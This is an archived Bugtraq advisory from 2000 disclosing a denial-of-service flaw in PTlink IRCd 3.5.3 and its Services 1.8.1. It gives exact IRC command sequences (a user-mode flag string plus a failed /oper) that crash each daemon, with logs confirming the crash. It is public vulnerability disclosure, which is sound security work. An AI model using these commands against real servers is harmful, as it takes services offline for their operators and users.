[17798] in bugtraq

home help back first fref pref prev next nref lref last post

Vulnerablity in PTlink3.5.3ircd + PTlink.Services.1.8.1...

daemon@ATHENA.MIT.EDU (egocentric coder)
Mon Nov 27 13:36:22 2000

Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id:  <LAW2-F186gQBjNEq0UM000039c0@hotmail.com>
Date:         Sun, 26 Nov 2000 23:58:42 -0000
Reply-To: wildcoyote@scripters-pt.org
From: egocentric coder <wildcoyote_db@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

                       PTlink3.5.3 IRCD + PTlink.Services1.8.1
                                     Advisory
                           by wildcoyote [lms@ispgaya.pt]

Hi!
I'm wildcoyote and i recently found a bug on the PTlink IRCD [3.5.3] + it's
services [1.8.1].
It is possible to kill the ircd and it's services...
To do so, you must:

[Crash Services] -

Connect to the irc server...
Then, do the following:
Issue a
/mode <your nick> +owgscfxeb
and a
/oper <oper nick> <something, doesnt really matter>
command!

This will cause the server to:

/mode <your nick> +owgscfxeb

[23:25] *** whocares sets mode: +wgsx

/oper <oper nick> <something, doesnt really matter>

-
Password Incorrect
-
[23:25] -freddy.userfriendly- Your attempt has been logged.
-
[23:26] -freddy.userfriendly- *** Notice -- Connection to
services.freddy.userfriendly[*@192.168.0.3] activated.
-
[23:26] -freddy.userfriendly- *** Notice -- Lost connection to
services.freddy.userfriendly[192.168.0.3]:Broken pipe
-

[root@freddy wildcoyote]# ps aux | grep services
[root@freddy wildcoyote]#

[Crash ircD] -

Connect to the irc server...
Then, do the following:
Issue a
/oper <oper nick> <something, doesnt really matter>
and a
/mode <your nick> +owgscfxeb
command!

This will cause the server to:

[23:43] -NickServ- This nickname is registered and protected.  If it is your
-
[23:43] -NickServ- nick, type /NickServ IDENTIFY password.  Otherwise,
-
[23:43] -NickServ- please choose a different nick.
-
[23:43] -NickServ- If you do not change within one minute, your nick will be
changed.

/oper wildcoyote whocares
-
Password Incorrect
-
[23:43] -freddy.userfriendly- Your attempt has been logged.

/mode mynick +owgscfxeb
-
[23:44] *** Disconnected

[root@freddy wildcoyote]# ps aux | grep ircd
[root@freddy wildcoyote]#

And..that's it for today kids :]

Regardz,

Luis Miguel Silva
aka wildcoyote aka wC

http://www.unsecurity.org/ Member
http://www.lonoss.org/ Member
http://www.ispgaya.pt/ Student

_____________________________________________________________________________________
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com
home help back first fref pref prev next nref lref last post